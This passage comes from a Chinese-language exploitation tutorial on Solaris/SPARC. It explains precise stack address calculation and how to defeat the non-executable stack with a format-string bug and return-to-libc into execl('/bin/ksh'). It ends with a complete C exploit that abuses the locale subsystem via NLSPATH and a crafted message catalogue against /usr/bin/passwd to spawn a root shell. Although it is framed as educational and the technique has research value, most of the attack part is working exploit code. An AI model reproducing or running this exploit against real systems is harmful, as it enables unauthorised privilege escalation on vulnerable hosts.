  为SPARC平台下的指令地址必须是4对齐的。因此我们必须让shellcode的起始
  地址在一个4对齐的边界上。同时还要猜测这个起始地址。以前采用的方法是
  在shellcode前面加上几个调整字节(0-3个)，通过改变调整字节的个数来让
  shellcode地址对齐，然后靠调节偏移量来猜测起始地址的位置。因此程序中
  总是少不了偏移量和对齐量。
  
  在x86平台下，很多本地溢出攻击时，经常将shellcode放到环境变量中，并
  使用execle()来屏蔽其他的环境变量，这时堆栈中看起来像这样：
  
       +----------+------------+----------+
  低址 |shellcode |vulprog name|0x00000000| 高址
       +----------+------------+----------+
        环境变量区  程序名      总是为0  
        
  堆栈的底部四个字节总是0，往上依次是“程序名"-->环境变量区        
  因此, shellcode的地址就是:
  shell_addr = 0xbffffffc - 程序名长度 - shellcode长度
  
  因此，我们可以看到，在x86平台下利用这种办法可以相当容易和准确的找到
  shellcode的地址。
  
  而在Solaris for SPARC下。利用这种方法时，堆栈中看起来像这样:
  
      +------------------------+-----------+--------+-----------+--------+
  低址|argv[0]argv[1]...argv[n]|env0...envn|platform|programname|00000000| 高址
      +------------------------+-----------+--------+-----------+--------+
      ^    命令行参数区         环境变量区  平台信息  程序名    ^总是为零
      |__startaddr                                              |__sp_addr 
  
  我们可以看到，与x86不同的是在环境变量区与程序名之间多了一个平台版本
  信息，通常是"SUNW,Ultra-250","SUNW,Ultra-Enterprise"之类的信息。
  在不同的Sun的硬件平台上，这块信息的长度可能是有变化的。但这个信息可
  以使用sysinfo(SI_PLATFORM, buf, len)来获取，因此可以说是已知的。
  
  另外实际上"程序名"和最后四个零字节之间并不是紧挨着的，而是经常可能
  会有几个零字节，似乎没有什么规律。这使得必须提供一个偏移量来得到储
  存在"环境变量区"中的shellcode的准确地址：
  sh_addr = sp_addr - 调整偏移量 - 程序名长度 - 平台信息长度 
                                 - 环境变量长度
  这里的环境变量长度是指shellcode加上它下面的环境变量(如果有的话)长度，
  
  另外还必须保证shellcode地址是4对齐的，因此必须使用gdb来调试或者暴力
  猜测。
  
  有没有能准确找到shellcode地址的方法呢？我偶然发现一个规律：堆栈中的
  命令行参数区的起始地址,也就是argv[0]的起始地址(上图中的startaddr)，
  总是一个能被4整除的地址。从它往后，依次填充各个字符串(互相紧挨着)。
  如果(命令行参数区长度 + 环境变量区长度 + 平台信息长度 + 程序名长度)
  是一个能被四整除的值，那么"程序名区"和最后四个零字节之间就没有多余
  的零字节；如果不能被四整除，比如余数为n, "程序名区"和最后四个零字节
  之间就会填充(3-n)个零字节。
  
  这实际上就是说在为这一块区域分配空间的时候，总是保证sp_addr - startaddr
  是一个可以被4整除的值。因为SPARC平台下内存分配时必须是以4字节为单位。
  
  有了这个规律，我们就可以很精确的找到shellcode的地址，也可以很容易的
  让它对齐了. 
  
  假设我们的环境变量区有三个字符串env0,env1,env2. shellcode放在env2中。
  (1) 首先我们设法让shellcode地址对齐。
  
  首先我们计算命令行参数区的长度 + env0的长度 + env1的长度, 如果这个总
  长度能被4整除，那么env2的起始地址肯定是4对齐的了；如果不能，我们就在
  env1中添加几个字节(字节数目 = 3 - (len%4))，使得重新计算得到的总长度
  可以被四整除。
  
  (2) 然后我们再来计算shellcode的精确地址。这个地址可以根据startaddr得
  到，也可以根据sp_addr得到。首先计算startaddr和sp_addr之间的这些字符串
  的总长度，然后通过前面说的规律算出实际的(sp_addr - startaddr)数值或者
  末尾添加的零字节数目。则shellcode地址就可以这样计算：
  
  sh_addr = sp_addr - (sp_addr - startaddr)的值 + 命令行参数长度 
             + env0长度 + env1长度
  或者             
  
  sh_addr = sp_addr - 末尾添加的零字节个数 - 程序名长度 - 平台信息长度 
            - shellcode长度
            
  虽然说起来比较罗嗦，实际算起来并不麻烦。在例程中大家一看就会明白了。

3. 利用格式串攻击突破Solaris不可执行堆栈保护

  Sloaris下的不可执行堆栈保护是通过去除堆栈的执行权限完成的。因此只能
  通过返回libc库或者利用库函数将shellcode拷贝到可执行内存执行的方法。
  这两种方法的实现原理与细节都已经在“Solaris for SPARC 堆栈溢出程序编
  写” 中讨论过了。这里只是谈一下如何利用格式串来完成攻击。为了简单起
  见,我们只讨论使用execl("ksh")的方法。我们所要完成的任务主要有三点：
  
  (1) 覆盖堆栈中保存的某函数的%i6(%fp)和%i7
  (2) 设置一个包含"/bin/ksh"的环境变量，并计算其地址
  (3) 在环境变量中构造一个假栈帧,填入execl()所需参数的地址
   
  实现方法:
    
  如果retloc是保存%i7的地址,那么覆盖的模板如图所示：  
  |AAAA(retloc-4)AAAA(retloc-2)AAAA(retloc)AAAA(retloc+2)|%.8x..%.8x|
   %(fp1)c%hn%(fp2)%hn%(execl1)c%hn%(execl2)%hn| 
  
  这里需要首先确定的是假栈帧的起始地址以及execl()的加载地址。
  假栈帧的起始地址必须是一个4对齐的地址，否则execl()不会工作。实际体
  现就是攻击程序似乎僵在那里了。
  由于我们的假栈帧是在环境变量中的，并不能保证一定是对齐的。因此利用
  2.中的讨论，我们在假栈帧前面增加一个环境变量env[1] = padding来进行调
  整。通过计算命令行参数区长度以及env[1]以前的的环境变量长度，我们可以
  准确的得到padding中所需字符的个数，使得假栈帧的起始地址对齐。我们构
  造的环境变量如下：
  
    env[0] = "xxx";         /* 其他的环境变量 */
    env[1] = padding;       /* 这个字符串就是来进行调节的 */    
    env[2]=(fakeframe);     /* 假栈帧开始*/    
    env[3]=&(fakeframe[40]);
    env[4]=&(fakeframe[40]);
    env[5]=&(fakeframe[40]);
    env[6]=&(fakeframe[44]);
    env[7]="/bin/ksh";       /* 保存"/bin/ksh"的环境变量 */
    env[8]=NULL;
  
  在确定了padding的大小后，我们就可以根据2.中的讨论来准确的计算假栈帧
  的起始地址以及"/bin/ksh"的地址了。
  
  现在，我们再也不用为猜测可恶的偏移量和对齐量头疼了。:)
  
  获得execl()的加载地址稍微有些麻烦。以前我们的做法是使用dlopen()和
  dlsym()函数获取攻击程序当前的共享库中execl()的加载地址，然后用这个
  地址来作为问题程序的execl()地址来使用的，这也是horizon在他的文章中
  使用的一个方法。然而，由于不同程序所加载的共享库不同，libc库加载的
  位置也不尽相同，因此很多时候这两个execl()地址并不相同。开始我想看一
  下它们的差值是否是有规律的，后来发现同样的问题程序，在不同的系统中，
  这个差值也不相同。似乎只能靠猜测来完成。不过我忽然想到，如果在编译
  攻击程序时也加载问题程序所用的动态共享库，那么libc库的加载位置不是
  就一样了吗？下一步就是如何获取问题程序的共享库了。ldd可以帮我们做
  到这点：
  
  [warning3@sun1 warning3]$ ldd /usr/bin/passwd
        libcmd.so.1 =>   /usr/lib/libcmd.so.1
        libcrypt_i.so.1 =>       /usr/lib/libcrypt_i.so.1
        libbsm.so.1 =>   /usr/lib/libbsm.so.1
        libdl.so.1 =>    /usr/lib/libdl.so.1
        libpam.so.1 =>   /usr/lib/libpam.so.1
        libnsl.so.1 =>   /usr/lib/libnsl.so.1
        libsocket.so.1 =>        /usr/lib/libsocket.so.1
        libmp.so.2 =>    /usr/lib/libmp.so.2
        libc.so.1 =>     /usr/lib/libc.so.1
        libgen.so.1 =>   /usr/lib/libgen.so.1
  
  当然这样的格式我们是没法用的，还得变换一下：
  [warning3@sun1 warning3]$ ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'
  -lcmd
  -lcrypt_i
  -lbsm
  -ldl
  -lpam
  -lnsl
  -lsocket
  -lmp
  -lc
  -lgen
  这样我们就可以用这些作为参数来编译我们的攻击程序了，例如：
  $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'`               

  根据实际测试的结果，这样得到的execl()加载地址与问题程序的是一样的。
  
说了这么多，最后还是提供一个实际的例子来验证一下吧。这是Solaris下locale
子系统的格式串问题的一个测试程序，可以用于使用了不可执行堆栈保护的
Solaris 2.6/7/8下。当然不同的系统retloc的值可能略有差异，这可能是你使
用这个测试程序时唯一需要调节的量了。:)

/* exploit for locale subsystem format strings bug In Solaris with non-exec stack.
* Tested in Solaris 2.6/7.0 (If it wont work, try adjust retloc offset. e.g. 
* ./ex -o -4 )
*
* $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'`
* usages: ./ex -h
*
* Thanks for Ivan Arce <iarce@core-sdi.com> who found this bug.
* Thanks for horizon's great article about defeating non-exec stack for Solaris.
*
* THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN
* ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.
*
*           by warning3@nsfocus.com (http://www.nsfocus.com)
*                                     y2k/11/10
*/

#include <stdio.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#include <fcntl.h>
#include <dlfcn.h>

#define BUFSIZE 2048                    /* the size of format string buffer*/
#define BUFF    128                     /* the progname buffer size */
#define SHELL   "/bin/ksh"              /* shell name */
#define DEFAULT_NUM 68                  /* format strings number */
#define DEFAULT_RETLOC 0xffbefb44       /* default retloc address */
#define VULPROG  "/usr/bin/passwd"      /* vulnerable program name */


void usages(char *progname)
{

        int i;
        printf("Usage: %s \n", progname);
        printf("          [-h]             Help menu\n");
        printf("          [-n number]      format string's number\n");
        printf("          [-b align1]      retloc buffer alignment\n");
        printf("          [-o offset]      retloc offset\n\n");

}

/* get current stack point address to guess Return address */
long get_sp(void)

{
        __asm__("mov %sp,%i0");
}


main( int argc, char **argv )

{

        char *pattern, retlocbuf[BUFF], *env1[11];
        char plat[BUFF], *ptr;
        long sh_addr, sp_addr, i;
        long retloc = DEFAULT_RETLOC, num = DEFAULT_NUM,  align1 = 0, offset=0;
        long  *addrptr;
        long reth, retl, reth1, retl1;
        FILE *fp;
        

        extern int optind, opterr;
        extern char *optarg;
        int opt;

        void *handle;
        long execl_addr, fp_addr, fp1_addr;
        char fakeframe[512];
        char padding[64], pad = 0;
        int env_len, arg_len, len;

        char progname[BUFF];


        strncpy(progname, argv[0], BUFF-1);

        while ((opt = getopt(argc, argv, "n:b:o:h")) != -1)
                switch((char)opt)
                {

                        case 'n':
                                num = atoi(optarg);
                                break;

                        case 'b':
                                align1 = atoi(optarg);
                                break;
                        case 'o':
                                offset = atoi(optarg);
                                break;
                        case '?':
                        case 'h':
                        default:
                                usages(progname);
                                exit(0);
                }

        retloc +=  offset;
        
        /* get platform info  */
        sysinfo(SI_PLATFORM,plat,256);

        /* Construct fake frame in environ */
        
        env1[0] = "NLSPATH=:.";
        env1[1] = padding;      /* padding so that fakeframe's address can be divided by 4 */
        /* sh_addr|sh_addr|0x00000000|fp2|fp2|fp2|fp2|fp2|0x00|/bin/ksh|0x00 */
        env1[2]=(fakeframe);     /* sh_addr|sh_addr|0x00                       */
        env1[3]=&(fakeframe[40]);/*                     |0x00                  */
        env1[4]=&(fakeframe[40]);/*                          |0x00             */
        env1[5]=&(fakeframe[40]);/*                               |0x00        */
        env1[6]=&(fakeframe[44]);/*                                    |fp2|fp2|fp2|fp2|fp2*/
        env1[7]=SHELL;           /* shell strings */
        env1[8]=NULL;

        /* calculate the length of "VULPROG" + argv[1] */
        arg_len = strlen(VULPROG) + strlen("-z") + 2;

        /* calculate the pad nummber .
         * We manage to let the length of padding + arg_len + "NLSPATH=." can
         * be divided by 4. So fakeframe address is aligned with 4, otherwise
         * the exploit won't work.
         */
        pad = 3 - (arg_len + strlen(env1[0]) +1)%4;
        memset(padding, 'A', pad);
        padding[pad] = '\0';

        /* get environ length */
        env_len = 0; 
        for(i = 0 ; i < 8 ; i++ )
           env_len += strlen(env1[i]) + 1;

         
       /* get the length from argv[0] to stack bottom 
        *                                                      
        * +------------------------+-----------+--------+-----------+--------+
        * |argv[0]argv[1]...argv[n]|env0...envn|platform|programname|00000000|
        * +------------------------+-----------+--------+-----------+--------+
        * ^                                                         ^ 
        * |__startaddr                                              |__sp_addr 
        *
        * "sp_addr" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6)
        *
        *  I find "startaddr" always can be divided by 4.
        *  So we can adjust the padding's size to let the fakeframe address
        *  can be aligned with 4.
        *
        * len = length of "argv" + "env" + "platform" + "program name" 
        * if (len%4)!=0, sp_addr - startaddr =  (len/4)*4 + 4
        * if (len%4)==0, sp_addr - startaddr =  len
        * So we can get every entry's address precisely based on startaddr or sp_addr.
        * Now we won't be bored with guessing the alignment and offset.:)
        */
       len = arg_len + env_len + strlen(plat) + 1 
                               + strlen(VULPROG) + 1;
       printf("len = %#x\n", len);

       /* get stack bottom address */

       sp_addr = (get_sp() | 0xffff) & 0xfffffffc;

        /* fp1_addr must be valid stack address */
        fp1_addr = (sp_addr & 0xfffffac0);

        /* get shell string address */
        sh_addr =  sp_addr - (4 - len%4) /* the trailing zero number */
                           - strlen(VULPROG) - strlen(plat)  - strlen(SHELL) - 3 ;

         printf("SHELL address = %#x\n", sh_addr);
         
        /* get our fake frame address */
        fp_addr = sh_addr - 8*8 - 1;

        /* get execl() address */
        if (!(handle=dlopen(NULL,RTLD_LAZY)))
        {                                    
          fprintf(stderr,"Can't dlopen myself.\n");
          exit(1);
        }
        if ((execl_addr=(long)dlsym(handle,"execl"))==NULL)
        {
          fprintf(stderr,"Can't find execl().\n");
          exit(1);
        }                                         
                
        /* dec 4 to skip the 'save' instructure */
        execl_addr -= 4;
        
        /* check if the exec addr includes zero  */
        if (!(execl_addr & 0xff) || !(execl_addr * 0xff00) ||
          !(execl_addr & 0xff0000) || !(execl_addr & 0xff000000))
        {
          fprintf(stderr,"the address of execl() contains a '0'. sorry.\n");
          exit(1);
        }

        printf("Using execl() address : %#x\n",execl_addr);

        /* now we set up our fake stack frame */

        addrptr=(long *)fakeframe;

        *addrptr++= 0x12345678; /* you can put any data in  local registers */
        *addrptr++= 0x12345678;
        *addrptr++= 0x12345678;
        *addrptr++= 0x12345678;
        *addrptr++= 0x12345678;
        *addrptr++= 0x12345678;
        *addrptr++= 0x12345678;
        *addrptr++= 0x12345678;

        *addrptr++=sh_addr;      /* points to our string to exec */
        *addrptr++=sh_addr;      /* argv[1] is a copy of argv[0] */
        *addrptr++=0x0;          /* NULL for execl();  &fakeframe[40] */
        *addrptr++=fp1_addr;     /* &fakeframe[44] */
        *addrptr++=fp1_addr;
        *addrptr++=fp1_addr;
        *addrptr++=fp1_addr;     /* we need this address to work  */
        *addrptr++=fp1_addr; /* cause we don't need exec another func,so put garbage here */

        *addrptr++=0x0;
        /* get correct retloc in solaris 2.6(0xefffxxxx) and solaris 7/8 (0xffbexxxx) */
        retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff);

        printf("Using RETloc address = 0x%x,  fp_addr = 0x%x  ,Align1= %d\n", retloc, fp_addr, align1 );

        /* Let's make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/

       addrptr = (long *)retlocbuf;
        for( i = 0 ; i < 8 ; i ++ )
            *(addrptr + i) = 0x41414141;
        *(addrptr + 1) = retloc - 4;
        *(addrptr + 3) = retloc - 2;
        *(addrptr + 5) = retloc ;
        *(addrptr + 7) = retloc + 2;

        if((pattern = (char *)malloc(BUFSIZE)) == NULL) {
           printf("Can't get enough memory!\n");
           exit(-1);
        }

        /* Let's make formats string buffer: 
         * |A..AAAAAAAAAAAA|%.8x....|%(fp1)c%hn%(fp2)%hn%(execl1)c%hn%(execl2)%hn|  
         */
        ptr = pattern;
        memset(ptr, 'A', 32);
        ptr += 32;

        for(i = 0 ; i < num ; i++ ){
           memcpy(ptr, "%.8x", 4);
           ptr += 4;
        }

        reth = (fp_addr >> 16) & 0xffff ;
        retl = (fp_addr >>  0) & 0xffff ;
        reth1 = (execl_addr >> 16) & 0xffff ;
        retl1 = (execl_addr >>  0) & 0xffff ;
        

        /* Big endian arch */
        sprintf(ptr, "%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn",
             (reth - num*8 -4*8 + align1 ), (0x10000 +  retl - reth),
             (0x20000 + reth1 - retl), (0x30000 + retl1 - reth1));

        if( !(fp = fopen("messages.po", "w+")))
        {
           perror("fopen");
           exit(1);
        }
        fprintf(fp,"domain \"messages\"\n");
        fprintf(fp,"msgid  \"%%s: illegal option -- %%c\\n\"\n");
        fprintf(fp,"msgstr \"%s\\n\"", pattern + align1);
        fclose(fp);
        system("/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po");

        /* thanks for z33d's idea. 
         * It seems we have to do like this in Solaris 8.
         */
        i=open("./SUNW_OST_OSLIB",O_RDWR);
        /* locate the start position of formats strings in binary file*/
        lseek(i, 62, SEEK_SET);
        /* replace the start bytes with our retlocbuf */
        write(i, retlocbuf + align1, 32 - align1);
        close(i);

       execle(VULPROG, VULPROG, "-z", NULL, env1);
}  /* end of main */


参考文献:

[1]. <<Defeating Solaris/SPARC Non-Executable Stack Protection>>,horizon <jmcdonal@unf.edu>